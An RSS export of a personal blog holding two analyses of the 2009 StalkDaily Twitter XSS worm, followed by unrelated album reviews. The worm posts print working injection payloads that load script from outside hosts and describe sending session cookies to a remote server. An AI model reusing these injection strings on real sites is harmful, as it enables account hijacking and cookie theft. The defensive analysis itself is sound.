<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Trevor Peacock &#187; TrevorP</title>
	<atom:link href="http://blog.peacocktech.com/author/trevorp/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.peacocktech.com</link>
	<description>Hey.. That looks like fun</description>
	<lastBuildDate>Sat, 06 Feb 2010 03:13:52 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>StalkDaily Worm Revisited</title>
		<link>http://blog.peacocktech.com/2009/04/14/stalkdaily-worm-revisited/</link>
		<comments>http://blog.peacocktech.com/2009/04/14/stalkdaily-worm-revisited/#comments</comments>
		<pubDate>Mon, 13 Apr 2009 14:43:15 +0000</pubDate>
		<dc:creator>TrevorP</dc:creator>
				<category><![CDATA[Life]]></category>

		<guid isPermaLink="false">http://blog.peacocktech.com/?p=177</guid>
		<description><![CDATA[Since posting yesterdays post, looking at the obfuscated StalkDaily worm, I have come across the sourcecode of the original unobfuscated worm on github. It does appear that becides the obfuscation, these are two different variants of the worm, with differing behaviours. While I believe the information in the previous is correct, the original worm, assuming [...]]]></description>
			<content:encoded><![CDATA[<p>Since posting <a href="/2009/04/12/stalkdaily-worm-analysis/">yesterdays post</a>, looking at the obfuscated StalkDaily worm, I have come across the <a href="http://gist.github.com/93782">sourcecode</a> of the original unobfuscated worm on github. It does appear that becides the obfuscation, these are two different variants of the worm, with differing behaviours. While I believe the information in the previous is correct, the original worm, assuming it was the baisis for the new version (assuming there were only 2 versions), asserts the assumptions I made. Disturbingly though, this previous version has a slightly disturbing behaviour. Read&nbsp;on.</p>
<h1>Analysis</h1>
<p>The code firstly defines 2 functions. 1) A complex function that returns a http connection object, allowing calls to a url (GET or POST) to be made. 2) A urlencode function to transform special characters in text to allow them to be sent as part of a&nbsp;url.</p>
<p>The code then performs the following actions when visiting an infected twitter&nbsp;page:</p>
<ul>
<li>Scan the pages HTML content, and extract the logged in users screen&nbsp;name.</li>
<li>retrieve stored cookies for the twitter&nbsp;domain</li>
<li>inserts into the document html an image element, the url of which is at uuuq.com and contains the above username and cookies. This effectively sends the username and cookies to the remove server, which most likely records&nbsp;them.</li>
<li>inserts into the document html an image element, showing the logo at&nbsp;stalkdaily.com</li>
</ul>
<p>Defined next is a function called wait. This function is then called via the setTimeout function. the setTimeout function sleeps for the specified time (allowing the browser to continue working), and then calls the requested function. The wait function does the&nbsp;following:</p>
<ul>
<li>Scans the html for the form_authenticity_token, a token placed there by twitter as an addition security mechanism designed to ensure the that action requests made to twitter originate from the browser, and logged in&nbsp;user.</li>
<li>ramdomly chooses from one of the following message:
<ul>
<li>Dude, www.StalkDaily.com is awesome. What&#8217;s the&nbsp;fuss?</li>
<li>Join www.StalkDaily.com&nbsp;everyone!</li>
<li>Woooo, www.StalkDaily.com <img src='http://blog.peacocktech.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
<li>Virus!? What? www.StalkDaily.com is&nbsp;legit!</li>
<li>Wow&#8230;www.StalkDaily.com</li>
<li>@twitter&nbsp;www.StalkDaily.com</li>
</ul>
</li>
<li>calls /status/update to tweet one of the above&nbsp;messages</li>
<li>calls /account/settings to update the users profile web page to:
<ul>
<li>http://www.stalkdaily.com&#8221;&gt;&lt;/a&gt;&lt;script&nbsp;src=&#8221;http://mikeyylolz.uuuq.com/x.js&#8221;&gt;&lt;/script&gt;&lt;a</li>
</ul>
</li>
</ul>
<h1>Conclusions</h1>
<p>The&nbsp;worm</p>
<ul>
<li>tweets a&nbsp;message</li>
<li>changes your profile web page to stalkdaily.com, but also injecting script code, thereby making this script a self-propogating&nbsp;worm.</li>
<li>sends your username and cookies to a remote&nbsp;server.</li>
</ul>
<p>The first two are similar to my analisis of the newer worm (although this uses the user-url field, rather than the profile-color&nbsp;field)</p>
<p>The third action is the dirsturbing one, though so far as I can tell, it was removed from the newer&nbsp;worm.</p>
<p>What this means, for those who viewed the profile of a user infected with the original&nbsp;worm:</p>
<ul>
<li>The remote site captures your username (no big&nbsp;deal)</li>
<li>The remote site has your username and the session cookies you are connecting&nbsp;with</li>
</ul>
<p>On a properly designed site, session cookies should only apply to a specific IP address. that is, if the remote hacker tries to re-use the username and cookies from a computer they control, twitter should reject the session, and require the user to&nbsp;login.</p>
<p>Twitter does not do this, which means acquiring the session cookie allows the remote hacker to impersonate your session. Presumabely twitter does not implement this security feature as a convenience, allowing twitter users to remain logged in while roaming to different internet&nbsp;connections.</p>
<p>Thankfully though, the session cookie is dropped from the server when you log out. Therefore logging out and back in will disallow the remote hacker from accessing your profile&nbsp;if:</p>
<ul>
<li>you log out of all sessions where you viewed an infected&nbsp;profile</li>
<li>the remote hacker has not changed your&nbsp;password</li>
</ul>
<p>As said in my previous article, users can and should protect themselves by only running javascript from sources they trust. The <a href="https://addons.mozilla.org/en-US/firefox/addon/722">NoScript</a> extension is an easy and relatively convenient way to do&nbsp;this.</p>
<p>Twitter 1) should review their code, ensuring all fields that accept information from the outside world properly escape all information sent, removing the possibility of XSS attacks, and 2) lock session cookies to a single IP address. The first I&#8217;m sure they have already done. The second I&#8217;m sure they will not, and probably will never&nbsp;*sigh*</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.peacocktech.com/2009/04/14/stalkdaily-worm-revisited/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>StalkDaily Worm Analysis</title>
		<link>http://blog.peacocktech.com/2009/04/12/stalkdaily-worm-analysis/</link>
		<comments>http://blog.peacocktech.com/2009/04/12/stalkdaily-worm-analysis/#comments</comments>
		<pubDate>Sun, 12 Apr 2009 12:07:25 +0000</pubDate>
		<dc:creator>TrevorP</dc:creator>
				<category><![CDATA[Life]]></category>

		<guid isPermaLink="false">http://blog.peacocktech.com/?p=168</guid>
		<description><![CDATA[Update: This post covers a newer version of the worm. I have located the original code, and it is reviewed in a newer&#160;post.
The following is a quickly developed, haphazard analysis of the StalkDaily worm that infected accounts of twitter users on 12Apr 2009. Apologies for the roughness. It was done to satisfy my own curiosity. [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Update</strong>: This post covers a newer version of the worm. I have located the original code, and it is reviewed in a <a href="/2009/04/14/stalkdaily-worm-revisited/">newer&nbsp;post</a>.</p>
<p>The following is a quickly developed, haphazard analysis of the StalkDaily worm that infected accounts of twitter users on 12Apr 2009. Apologies for the roughness. It was done to satisfy my own curiosity. If you spot something clearly wrong, let me know. If anyone would like any further information, please contact&nbsp;me.</p>
<h1>Observation</h1>
<p>By observation, this worm does the&nbsp;following:</p>
<ul>
<li>Causes you to tweet something like:
<ul>
<li><span class="status-body"><span class="entry-content">Wow&#8230;Mikeyy.</span></span></li>
<li><span class="status-body"><span class="entry-content">Mikeyy.&nbsp;Woooo!</span></span></li>
<li><span class="status-body"><span class="entry-content">Dude, Mikeyy is the shit! :<strong></strong>)</span></span></li>
<li><span class="status-body"><span class="entry-content">damn mikeyy.&nbsp;haha.</span></span></li>
<li><span class="status-body"><span class="entry-content">Man, Twitter can&#8217;t fix shit. Mikeyy owns. :<strong></strong>)</span></span></li>
<li><span class="status-body"><span class="entry-content">Twitter should really fix this&#8230;&nbsp;Mikeyy</span></span></li>
</ul>
</li>
<li><span class="status-body">Causes you to follow profile 28546293, or&nbsp;onedegrees</span></li>
<li><span class="status-body">Updates your profile name to &#8220;Mikey&nbsp;Owns&#8221;</span></li>
<li><span class="status-body">inserts a link to the worm code into your profiles color field<br />
</span></li>
</ul>
<h1>Unpacking</h1>
<p>By comparing the accounts of infected and uninfected users we see the following&nbsp;code:</p>
<p style="padding-left: 30px;">a { color: #&lt;/style&gt;mikeyy:)           &#8220;&gt;&lt;/a&gt;&lt;scr<strong></strong>ipt&gt;document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6f%6d%67%68%61%78%2e%75%75%75%71%2e%63%6f%6d%2f%77%6f%6f%2e%70%68%70%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));&lt;/script&gt;                      &lt;style&gt; &lt;a ;&nbsp;}</p>
<p>This appears in the place where we would expect to see a css color element as&nbsp;follows:</p>
<p style="padding-left: 30px;">a { color: #0000ff;&nbsp;}</p>
<p>This appears to be an injection into the twitter database, replacing the colour code of the page with JavaScript code. The JavaScript code instructs the browser to load the JavaScript code located at http://omghax.uuuq.com/woo.php. By watching proxy logs of a machine browsing infected pages, we see the following pages being&nbsp;accessed:</p>
<p style="padding-left: 30px;">http://omghax.uuuq.com/woo<br />&nbsp;http://omghax.uuuq.com/bam</p>
<p>This is explained by examining one of these scripts. Within the script is found the following&nbsp;strings:</p>
<ul>
<li>Msxml2.XMLHTTP</li>
<li>Microsoft.XMLHTTP</li>
<li>connect</li>
<li>oUpperCase</li>
<li>GET</li>
<li>?</li>
<li>open</li>
<li>Method</li>
<li>POST</li>
<li>HTTP/1.1</li>
<li>setRequestHeader</li>
<li>Content-Type</li>
<li>application/x-www-form-urlencoded</li>
<li>onreadystatechange</li>
<li>readyState</li>
<li>send</li>
<li>split</li>
<li>join</li>
<li>&#8216;</li>
<li>%27</li>
<li>(</li>
<li>%28</li>
<li>)</li>
<li>%29</li>
<li>*</li>
<li>%2A</li>
<li>~</li>
<li>%7E</li>
<li>!</li>
<li>%21</li>
<li>%20</li>
<li>+</li>
<li>%</li>
<li>replace</li>
<li>innerHTML</li>
<li>documentElement</li>
<li>exec</li>
<li>Dude, Mikeyy is the shit! <img src='http://blog.peacocktech.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
<li>Man, Twitter can&#8217;t fix shit. Mikeyy owns. <img src='http://blog.peacocktech.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
<li>Mikeyy.&nbsp;Woooo!</li>
<li>Dude! Mikeyy! Seriously? Haha. <img src='http://blog.peacocktech.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </li>
<li>Wow&#8230;Mikeyy.</li>
<li>damn mikeyy.&nbsp;haha.</li>
<li>random</li>
<li>length</li>
<li>floor</li>
<li>&lt;/style&gt;mikeyy:) &#8220;&gt;&lt;/a&gt;&lt;script&gt;document.write(&lt;script src=&#8221;http://omghax.uuuq.com/woo.php&#8221;&gt;&lt;/script&gt;.source));&lt;/script&gt; &lt;style&gt;&nbsp;&lt;a</li>
<li>&lt;/style&gt;mikeyy:) &#8220;&gt;&lt;/a&gt;&lt;script&gt;document.write(&lt;script src=&#8221;http://content.ireel.com/jsxss.js&#8221;&gt;&lt;/script&gt;.source));&lt;/script&gt;&nbsp;&lt;style&gt;&lt;a</li>
<li>&lt;/style&gt;mikeyy:) &#8220;&gt;&lt;/a&gt;&lt;script&gt;document.write(&lt;script src=&#8221;http://content.ireel.com/xssjs.js&#8221;&gt;&lt;/script&gt;.source));&lt;/script&gt;&nbsp;&lt;style&gt;&lt;a</li>
<li>&lt;/style&gt;mikeyy:) &#8220;&gt;&lt;/a&gt;&lt;script&gt;document.write(&lt;script src=&#8221;http://omghax.uuuq.com/bam&#8221;&gt;&lt;/script&gt;.source));&lt;/script&gt;&nbsp;&lt;style&gt;&lt;a</li>
<li>&lt;/style&gt;mikeyy:) &#8220;&gt;&lt;/a&gt;&lt;script&gt;document.write(&lt;script src=&#8221;http://omghax.uuuq.com/woo&#8221;&gt;&lt;/script&gt;.source));&lt;/script&gt;&nbsp;&lt;style&gt;&lt;a</li>
<li>/account/profile_settings</li>
<li>POST</li>
<li>authenticity_token=</li>
<li>&amp;user[profile_link_color]=</li>
<li>&amp;commit=save+changes</li>
<li>/account/settings</li>
<li>&amp;user[name]=Mikeyy+Owns&amp;user[url]=</li>
<li>&amp;tab=home&amp;update=update</li>
<li>/status/update</li>
<li>&amp;status=</li>
<li>&amp;return_rendered_status=true&amp;twttr=true</li>
<li>/friendships/create/28546293</li>
<li>&amp;twttr=true</li>
<li>wait()</li>
</ul>
<h1>Analysis</h1>
<p>Towards the bottom of this list you start to see some important&nbsp;elements:</p>
<ul>
<li>/account/profile_settings    &amp;user[profile_link_color]=&nbsp;&amp;commit=save+changes</li>
<li>/account/settings&nbsp;&amp;user[name]=Mikeyy+Owns&amp;user[url]=</li>
<li>/status/update</li>
<li>/friendships/create/28546293</li>
</ul>
<p>While the code is obfuscated, and beyond my knowledge to easily decode, these strings provide some important clues. I would assume that the worm is calling URLs at twitter using these strings. Conceivably these&nbsp;would</p>
<ul>
<li>Update the profile colour, inserting the worm&nbsp;code</li>
<li>Update the profile&nbsp;name</li>
<li>creating a friendship with&nbsp;onedegrees</li>
</ul>
<p>Because the code is run inside the browser, in the context of normal page views by the logged in twitter user, the code &#8220;acts on your behalf&#8221;, to perform these actions. Neither the script, or the script author know your username or password, it simply &#8220;asks&#8221; the browser to perform these actions. Because you are already logged on in the browser, the action is performed as if you did it&nbsp;yourself.</p>
<h1>Conclusion</h1>
<p>I would estimate that the root cause of this problem is an JavaScript injection vulnerability in twitters color field, which now seems to be fixed. This allowed the worm to place JavaScript code inside this field, rather than the expected colour code which would normally be sent by the&nbsp;browser.</p>
<p>While not the cause, another vulnerability that allowed this to happen is the web-browsers in-built JavaScript engine, which runs any JavaScript code it is instructed to. This to me is not desirable. In effect, every time you visit a website, you are inviting some unknown person to run whatever JavaScript code they like inside your browser. This is historically the cause of many major security and virus problems, and will be into the&nbsp;future.</p>
<p>JavaScript is a useful tool in creating interactive websites, but must considered carefully. I recommend disabling JavaScript by default and only enabling it for sites you trust. The <a href="https://addons.mozilla.org/en-US/firefox/addon/722">NoScript</a> extension makes this&nbsp;easy.</p>
<p>Being that the malicious code in the StalkDaily worm was hosted on an external site, running twitters javascript code would not have allowed this worm to execute unless you also permitted code from uuuh.com to run&nbsp;also.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.peacocktech.com/2009/04/12/stalkdaily-worm-analysis/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Avenged Sevenfold</title>
		<link>http://blog.peacocktech.com/2009/03/24/avenged-sevenfold/</link>
		<comments>http://blog.peacocktech.com/2009/03/24/avenged-sevenfold/#comments</comments>
		<pubDate>Mon, 23 Mar 2009 13:30:36 +0000</pubDate>
		<dc:creator>TrevorP</dc:creator>
				<category><![CDATA[Music]]></category>

		<guid isPermaLink="false">http://blog.peacocktech.com/?p=139</guid>
		<description><![CDATA[This album, also bought on a whim, is a 2007 self-titled album from a Favourite artist, and has become a new favourite album from this&#160;band.
Listening to the album was a little unpredictable, I had trouble with the first few tracks. After listening to this album for a month (a clear sign I have enjoyed the [...]]]></description>
			<content:encoded><![CDATA[<p><script src="/wp-content/uploads/2009/01/swfobject.js" type="text/javascript"></script>This album, also bought on a whim, is a 2007 self-titled album from a Favourite artist, and has become a new favourite album from this&nbsp;band.</p>
<p>Listening to the album was a little unpredictable, I had trouble with the first few tracks. After listening to this album for a month (a clear sign I have enjoyed the album, aside it sky-rocketing to the #1 artist in my <a href="http://www.last.fm/user/TrevorPeacock">last.fm</a> profile) I have never found myself revisiting the early tracks. The first (Critical Acclaim) is far too angry for my tastes. After a bland organ intro, it drops into some unimaginative rhythms. A very provoking vocal style, almost yelling, feels like a violent street brawl, I just want to get out. The chorus is almost redeeming, until Matthew octaves up the final note, destroying the&nbsp;relief.</p>
<p>The second (Almost Easy) has a mix of elements, both good and&nbsp;bad.</p>
<ul>
<li>Some really interesting vocal&nbsp;styles.</li>
<li>The chorus (mother) brings back some of my favourite elements from previous albums, the vocal harmonies, and contrast of vocal&nbsp;styles.</li>
<li>Terribly boring driving&nbsp;snare.</li>
<li>Unclear, and therefore untidy sounding fast&nbsp;rifs.</li>
</ul>
<p>Scream begins with a Disturbed (band) inspired intro. And carefully builds with the aid of small details like piano fills. It tops it off with a carefully created chorus, with a very slightly pop rhythm feel that I find very present. The vocal harmonies were a slight acquired taste, but well worth&nbsp;it.</p>
<div id="0903-Avenged-player">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/03/avenged1.mp3');
so.write('0903-Avenged-player');
// --></script>0:00-Critical Acclaim; 0:41-Almost Easy;&nbsp;1:01-Scream</p>
<p>Afterlife is where this album begins to come into its own. A string intro that magically transitions into a traditional Avenged riff. A killer sounding bass brings in the verse. The bridges are fun, with heavy emphasis on the offbeat. The strings make a re-appearance in a short interlude, but continue after the guitar solo acting like a Latin horn section, emphasising the staccato rhythm. Non-existent outro, but then it would be hard otherwise to transition into the next&nbsp;track.</p>
<p>Gunslinger starts with a acoustic (steel string) intro, which they seem to find room for every album, and do a fine job, before rocketing into the track with an unforgiving power-chord riff. I love the subtle guitar soloing behind this track when it extends away from simple a arpeggio, that and the spirit-raising female backing&nbsp;vocals.</p>
<div id="0903-Avenged-player2">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/03/avenged2.mp3');
so.write('0903-Avenged-player2');
// --></script>0:00-Afterlife;&nbsp;0:40-Gunslinger</p>
<p>Tack 6 &#8220;Unbound (The Wild Ride)&#8221; is indeed the start of a wild ride, an amazing four tracks.<br />
A song of tremendous contrast within itself, dueling guitar guitars followed by beautifully intricate piano runs, the quality of vocals, between clear and gruff, the double kick, which serves this song well, to the melody toms, small choir, and the childlike vocals that take out the&nbsp;track.</p>
<p>Brompton Cocktail is easy to like. It makes heavy use of my favourite 4-beat bar subdivision, the 3-3-2 pattern. The string highlights in the verse are lovely, but builds the song to a slightly empty&nbsp;chorus.</p>
<p>Lost was a bit difficult to judge, the shock of the vocal auto-tuner in the chorus took a while to get over, but after several listens I grew to like the way the effect was used. With previous albums the big selling point for me were the occasional multiple vocal harmonies, especially the slides from note to note. While some might argue the musicality of the individual voices, the combined effect was a win for me. While the auto-tuner removes the ability to create slides, it was carefully added to allow slides where required. The slight vocorder effect also for me provides an extra layer of expression, when selectively used. I think of it as an alternative to a gruff vocal style, just another tool in the&nbsp;kit.</p>
<div id="0903-Avenged-player3">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/03/avenged3.mp3');
so.write('0903-Avenged-player3');
// --></script>0:00-Unbound; 0:53-Brompton Coctail;&nbsp;1:23-Lost</p>
<p>A Little Piece of Heaven has been my addiction for weeks. First I want to list the instruments from the liner&nbsp;notes:</p>
<ul>
<li><b>Strings, Horns &#038; Choir Arrangements</b>&thinsp;&#8211;&thinsp;Steve&nbsp;Bartek</li>
<li><b>Piano &#038; Organ</b>&thinsp;&#8211;&thinsp;Jamie&nbsp;Muhoberac</li>
<li><b>Upright Bass</b>&thinsp;&#8211;&thinsp;Miles&nbsp;Mosley</li>
<li><b>Cello</b>&thinsp;&#8211;&thinsp;Cameron&nbsp;Stone</li>
<li><b>Violins</b>&thinsp;&#8211;&thinsp;Caroline Campbell and Neil&nbsp;Hammond</li>
<li><b>Viola</b>&thinsp;&#8211;&thinsp;Andrew&nbsp;Duckles</li>
<li><b>Choir</b>&thinsp;&#8211;&thinsp;Beth Anderson, Monique Donnelly, Rob Giles, Debbie Hall, Scottie Haskell, Luana Jackson, Bob Joyce, Rock Logan, Susie Stevens Logan, Arnold McCuller, Gabriel Mann and Ed&nbsp;Zajack</li>
<li><b>Alto Sax</b>&thinsp;&#8211;&thinsp;Bill Liston and Brandon&nbsp;Fields</li>
<li><b>Clarinet</b>&thinsp;&#8211;&thinsp;Bill Liston and Rusty&nbsp;Higgins</li>
<li><b>Tenor Sax</b>&thinsp;&#8211;&thinsp;Dave Boruff and Rusty&nbsp;Higgins</li>
<li><b>Baritone Sax</b>&thinsp;&#8211;&thinsp;Joel&nbsp;Peskin</li>
<li><b>Trumpet</b>&thinsp;&#8211;&thinsp;Wayne Bergeron and Dan&nbsp;Foreno</li>
<li><b>Trombone</b>&thinsp;&#8211;&thinsp;Bruce Fowler and Alex&nbsp;IIes</li>
<li><b>Additional Vocals</b>&thinsp;&#8211;&thinsp;Juliette&nbsp;Commagere</li>
</ul>
<p>This of course, in addition to the normal vocalist, guitars, bass and drums, and for me sets the stage for an exciting piece. The content of the song is quite graphic in parts, dealing with greed, lust, murder, necrophilia, reanimation/undead, and mass slaughter, but for those not offended may prove somewhat humours.<br />
The musical content is absolutely thrilling, displaying a magically created wide ranging collection of sounds, tightly woven to help tell the story. For example, the piece starts with clarinets/piano builds with bari sax, tenor sax, and choir into a violent double kick driven rif, supported by sax and clarinets. Follows is a very rhythmic passage of percussion and clarinet, introducing guitars and horns, leading into some lovely rhythms and horn crescendos. A comic section consisting of a strong bari sax bass, a taunting clarinet and organ, and offbeat horns. Shortly after a strong guitar and choir section, with staccato strings magically transitions into a beautiful string passage lead by the bands vocal harmony. A strength an aspect that is a particular favourite of mine.<br />
The song makes tremendous use of dynamics, something becoming a lost art, even among metal, where there are often only 2 settings, gentle crescendos and diminuendos can be so powerful in the right places.<br />
The song certainly is a magical ride. I feel the the Bari sax provides subtle but crucial support to this song, and the uniquely wide range of instruments allows a powerful range of tones and expression, which was masterfully used.<br />
<a href="http://www.youtube.com/results?search_query=%22avenged+sevenfold%22+%22a+little+piece+of+heaven%22">YouTube</a> has several several videos, many of which use the song in its entirety as a&nbsp;backing.</p>
<p>The album winds down with a pleasant country/blues track, a tradition for Avenged Sevenfold albums to include one on every&nbsp;album.</p>
<div id="0903-Avenged-player4">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/03/avenged4.mp3');
so.write('0903-Avenged-player4');
// --></script>Dear&nbsp;God</p>
<p>This album I&#8217;m sure will still remain a favourite throughout the year, and I hope I find even just one or two albums that come close to matching this. If so it will make for a magical year of&nbsp;listening.</p>
<p>Check <a href="http://en.wikipedia.org/wiki/Avenged_Sevenfold">Wikipedia</a> for more information on the band and their&nbsp;albums.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.peacocktech.com/2009/03/24/avenged-sevenfold/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cryptopsy and Nevetherym</title>
		<link>http://blog.peacocktech.com/2009/02/01/cryptopsy-and-nevetherym/</link>
		<comments>http://blog.peacocktech.com/2009/02/01/cryptopsy-and-nevetherym/#comments</comments>
		<pubDate>Sun, 01 Feb 2009 12:30:14 +0000</pubDate>
		<dc:creator>TrevorP</dc:creator>
				<category><![CDATA[Music]]></category>

		<guid isPermaLink="false">http://blog.peacocktech.com/?p=91</guid>
		<description><![CDATA[These two albums were bought without research. While waiting for an order of CDs to arrive, desperate for something to listen to I picked up a few albums in&#160;Wagga.
Cryptopsy&#8201;&#8211;&#8201;The Unspoken&#160;King
Never having heard this band before, I was enticed by a review on the cover; &#8220;&#8230;time signature blasphemy&#8230; bouts of unpredictable musical passages&#8230;&#8221;. These words are [...]]]></description>
			<content:encoded><![CDATA[<p><script src="/wp-content/uploads/2009/01/swfobject.js" type="text/javascript"></script>These two albums were bought without research. While waiting for an order of CDs to arrive, desperate for something to listen to I picked up a few albums in&nbsp;Wagga.</p>
<h2>Cryptopsy&thinsp;&#8211;&thinsp;The Unspoken&nbsp;King</h2>
<p>Never having heard this band before, I was enticed by a review on the cover; &#8220;&#8230;time signature blasphemy&#8230; bouts of unpredictable musical passages&#8230;&#8221;. These words are quite true, but unfortunately far more literally than I had expected. I&#8217;m not sure the use of &#8220;musical&#8221;is a complement, if only parts are musical, what fills the other 42 minutes of the album?  OK, I have found it hard listening to this album, listening to it in the car while travelling, and while working did not reveal anything worth hearing, but now listening to it with a good pair of headphones I&#8217;m coming to grips with this album, but I&#8217;m still not impressed.  It all started when in the opening seconds of the album I heard&nbsp;this:</p>
<div id="0902-CryptNev-player">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/02/cryptopsy1.mp3');
so.write('0902-CryptNev-player');
// --></script></p>
<p>Blast beat is something I can rarely tolerate. It overpowers any attempt to create melody or harmony, and fatigues the ears, making more than a few songs hard to tolerate. But alas, it remains for much of the&nbsp;album.</p>
<div id="0902-CryptNev-player2">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/02/cryptopsy9.mp3');
so.write('0902-CryptNev-player2');
// --></script></p>
<p>The first track holds no merit in my mind, the second has a solid groove in parts, but is totally unsupported, with no depth to make the song memorable. The short guitar solo is one of the few short passages where the listener is granted a reprieve from the wall of blast&nbsp;beat.</p>
<p>The rest of the album is much the same, walls of unmelodious sound, with occasional pauses from the drummer while a guitar plays a short melody. The album has some good rifs, some nice sounds, good material for contrast, but its assembled haphazardly, with no structure, building of ideas. I love bizarre time signature changes, but this album creates nothing from them. They&#8217;re there, but they do not convey anything to the&nbsp;listener.</p>
<p>If I had to recommend two tracks from this album, it would be 10, and perhaps 5. They have a fair variety, and at least some flow and&nbsp;structure.</p>
<div id="0902-CryptNev-player3">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/02/cryptopsy10.mp3');
so.write('0902-CryptNev-player3');
// --></script></p>
<div id="0902-CryptNev-player4">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/02/cryptopsy5.mp3');
so.write('0902-CryptNev-player4');
// --></script></p>
<p>This from track three is also one of the more&nbsp;enjoyable</p>
<div id="0902-CryptNev-player5">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/02/cryptopsy3.mp3');
so.write('0902-CryptNev-player5');
// --></script></p>
<p>On the whole I don&#8217;t see myself revisiting this album, Its been hard enough to get through to pull out the few bits I do&nbsp;like.</p>
<h2>Nevetherym&thinsp;&#8211;&thinsp;Rendezvous</h2>
<p>This was an interesting album. I had no idea what to expect. It was a 3 track album for $10. Its a self published album (the first) from the Central Coast. With only three tracks I figured there had to be something worthwhile there to warrant publishing a short CD. It must be &#8220;Interesting if not good&#8221; I said to myself, and the proprietor as I purchased the CD. The 26 minute album had me hooked immediately. Its amateurish, I cringe with every bad decision made in building the album, but there is so much promise that I find myself listening over and&nbsp;over.</p>
<p>Mix and recording wise, the album is a little awkward, over distorted and unclear in parts, but that is to be expected. The technical ability leaves some to be desired, phrasing, dynamics and timing aren&#8217;t perfect, but these can, and I&#8217;m sure will be worked&nbsp;on.</p>
<p>A violin features in all three songs, and baring the previous comment, sits very well. The vocals are the biggest disappointment. Conceptually they&#8217;re fine, but in execution, some vocal training is much needed to keep the voice on&nbsp;pitch.</p>
<p>The guitar rhythm in track one is very top 40 rock/old school Nickelback, which I like. It has a very different feel when layered with the violin. Great contrast between light and heavy sections, and great transitions. Slightly repetitive (a complaint I often have), but at least it helps to build the feel throughout the song by allowing you to become used to one feel before dragging you into another. Fantastic light section. Slight awkwardness in parts of the violin melody, but largely OK, great feel from the guitar, invoking an image of bells in my mind.<br />
Slightly over-enthusiastic leading into the lifts, with the timing slightly off. Some poor melody choices in the violin back in the heavy section. Additionally the violin should NOT play the same riff as the guitars, it weakens the position of the violin to create emotion, and adds nothing to the feel. Some great chords thrown in towards the end to throw the listener off balance, before returning to the driving riff to&nbsp;finish.</p>
<div id="0902-CryptNev-player6">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/02/nevetherym1.mp3');
so.write('0902-CryptNev-player6');
// --></script></p>
<p>Track 2 really shows the cracks in the vocals and the tone of the band, but still remains a solid effort. A shorter piece, less depth, but action packed. Again, terrific contrast, and very aggressive, and super moody. Bass guitar solo is muddy, and again, I&#8217;d like to see the violin do its own thing, or nothing at&nbsp;all.</p>
<div id="0902-CryptNev-player7">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/02/nevetherym2.mp3');
so.write('0902-CryptNev-player7');
// --></script></p>
